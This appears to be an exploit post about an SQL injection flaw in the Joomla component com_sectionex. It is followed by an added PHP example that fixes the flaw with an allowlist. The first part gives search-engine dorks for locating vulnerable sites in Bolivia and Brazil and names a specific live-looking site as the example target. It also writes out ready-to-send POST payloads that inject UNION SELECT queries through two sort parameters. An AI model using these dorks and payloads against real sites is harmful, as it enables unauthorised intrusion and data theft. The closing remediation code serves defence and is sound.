Wednesday, August 28, 2013

Joomla com_sectionex v2.5.96 SQL Injection vulnerability

DORK:site:bo inurl:/index.php?option=com_sectionex
DORK:site:br inurl:/index.php?option=com_sectionex

[1] "filter_order" parameter:

URL /index.php?option=com_sectionex&view=category&id=X(INT)&Itemid=Y(INT)

EXAMPLE:
http://www.lapaz.bo/index.php?option=com_sectionex&view=category&id=143&Itemid=777

EXPLOIT:POST-> filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from
dual)%23&filter_order_Dir=DESC


[2] "filter_order_Dir" parameter:

EXAMPLE:
http://www.lapaz.bo/index.php?option=com_sectionex&view=category&id=143&Itemid=777

EXPLOIT:POST-> filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23
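
Both POST bodies above put SQL text in `filter_order` and `filter_order_Dir`, so both values reach the query without validation. The following is an added example, not code from the component or from the original post, showing the usual fix for sort parameters: an allowlist for the column and a two-value choice for the direction. The function name and column names are hypothetical, and it assumes the values end up in an ORDER BY clause.

```php
<?php
// Added example: allowlist validation of the two sort parameters.
// Column names are hypothetical; the component's schema is not on the page.
const ALLOWED_ORDER_COLUMNS = ['title', 'created', 'hits', 'ordering'];
const DEFAULT_ORDER_COLUMN  = 'ordering';

/**
 * Build an ORDER BY clause from request data. Only values that exactly
 * match a fixed list can appear in the returned SQL fragment.
 */
function safe_order_clause(array $post): string
{
    $column = $post['filter_order'] ?? DEFAULT_ORDER_COLUMN;
    $dir    = $post['filter_order_Dir'] ?? 'ASC';

    // Exact, type-strict match against the fixed list; arrays and
    // unknown strings fall back to the default column.
    if (!is_string($column) || !in_array($column, ALLOWED_ORDER_COLUMNS, true)) {
        $column = DEFAULT_ORDER_COLUMN;
    }
    // Direction is one of two literals, chosen by comparison.
    $dir = (is_string($dir) && strtoupper(trim($dir)) === 'DESC') ? 'DESC' : 'ASC';

    return 'ORDER BY `' . $column . '` ' . $dir;
}

// Constructed requests: one benign, two shaped like the POST bodies above,
// and one that sends an array instead of a string.
$injected = ' limit 1 offset 10000) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)#';
$requests = [
    'benign'           => ['filter_order' => 'title', 'filter_order_Dir' => 'desc'],
    'filter_order'     => ['filter_order' => '1' . $injected, 'filter_order_Dir' => 'DESC'],
    'filter_order_Dir' => ['filter_order' => '1', 'filter_order_Dir' => 'DESC' . $injected],
    'array value'      => ['filter_order' => ['title'], 'filter_order_Dir' => 'DESC'],
];

foreach ($requests as $label => $post) {
    printf("%-17s %s\n", $label, safe_order_clause($post));
}
```

Identifiers cannot be bound as prepared-statement parameters, which is why sort columns and directions need this kind of fixed-list mapping rather than escaping.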